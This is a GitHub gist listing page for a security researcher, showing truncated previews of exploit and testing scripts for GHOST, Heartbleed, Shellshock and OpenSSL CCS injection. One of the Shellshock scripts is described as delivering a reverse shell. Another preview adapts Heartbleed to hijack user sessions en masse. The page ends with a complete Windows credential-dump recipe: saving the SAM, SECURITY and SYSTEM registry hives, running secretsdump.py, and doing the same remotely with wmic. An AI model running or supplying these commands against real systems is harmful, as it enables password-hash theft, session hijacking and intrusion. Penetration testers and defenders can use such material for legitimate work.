sh1n0b1’s gists

sh1n0b1 / CVE-2015-0235.c

Created January 28, 2015 06:34

CVE-2015-0235

	#include <netdb.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <errno.h>
	#include <gnu/libc-version.h>
	#define CANARY "in_the_coal_mine"
	struct {
	char buffer[1024];
	char canary[sizeof(CANARY)];

sh1n0b1 / SourceAnalyzer.php

Created January 15, 2015 19:55

PHP Source Analyzer from http://hawkee.com/snippet/4271/

	<html>
	<title>PHP Source Analyzer by Delicon</title>
	<head>
	<script language="JavaScript">
	function mouseDown_Action(c_id) {
	var obj = document.getElementById(c_id);
	if (obj.style.visibility == 'hidden') {
	obj.style.visibility = 'visible';
	obj.style.position = 'static';
	} else {

sh1n0b1 / gist:ed44ae7316af7337e454

Created October 10, 2014 08:15

	#!/bin/python

	import sys
	import socket
	import time
	import struct

	if len(sys.argv)<2:
	print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
	quit()

sh1n0b1 / http-vuln-cve-2014-6271.nse

Created October 6, 2014 09:15

NSE script for Shellshock vulnerability, CVE-2014-6271

	local http = require "http"
	local shortport = require "shortport"
	local stdnse = require "stdnse"
	local vulns = require "vulns"

	description = [[
	NSE script that delivers you a reverse shell using CVE-2014-6271.
	Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
	--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
	<ip> -d

sh1n0b1 / dana-na.cgi

Created August 17, 2014 14:01

	#!/usr/bin/perl -w

	use CGI;
	use Digest::MD5 qw(md5_hex);

	$cgi = new CGI;
	$SESSDIR = "/tmp/";
	$sessfile = $cgi->cookie("diagsess");
	$arg0 = $cgi->param("arg");
	$action = $cgi->param("action");

sh1n0b1 / a04c152139d85507cac88fcc4aaf9ca9

Last active August 29, 2015 14:05

a04c152139d85507cac88fcc4aaf9ca9

	$sesshash{'ip'} = '68.227.245.145';
	$sesshash{'user'} = 'admin';

sh1n0b1 / reddit.py

Created June 12, 2014 04:40

Python Script to parse XSS payload from reddit by Peter Kim

	#!/usr/bin/env python
	#Reddit XSS
	#Author: Cheetz
	import urllib2, sys
	import logging, os, re, sys, urllib, string
	from optparse import OptionParser
	from urlparse import urlparse

	class Lookup:
	def run(self,url):

sh1n0b1 / heartbleed-altered.py

Created April 9, 2014 09:44

Using Heartbleed PoC for Hijacking User Sessions En Masse

	#!/usr/bin/python

	# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
	# Michael Davis ([email protected])

	# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])

	# The author disclaims copyright to this source code.

	# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/

sh1n0b1 / ssltest.py

Created April 8, 2014 07:53

Python Heartbleed (CVE-2014-0160) Proof of Concept

	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
	# The author disclaims copyright to this source code.

	import sys
	import struct
	import socket
	import time
	import select

sh1n0b1 / hashdump.reg

Last active December 8, 2023 21:53

Windows local Hash Dump

	reg.exe save hklm\sam c:\temp\sam.save
	reg.exe save hklm\security c:\temp\security.save
	reg.exe save hklm\system c:\temp\system.save
	secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

	#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py

	#Do this remotely
	wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"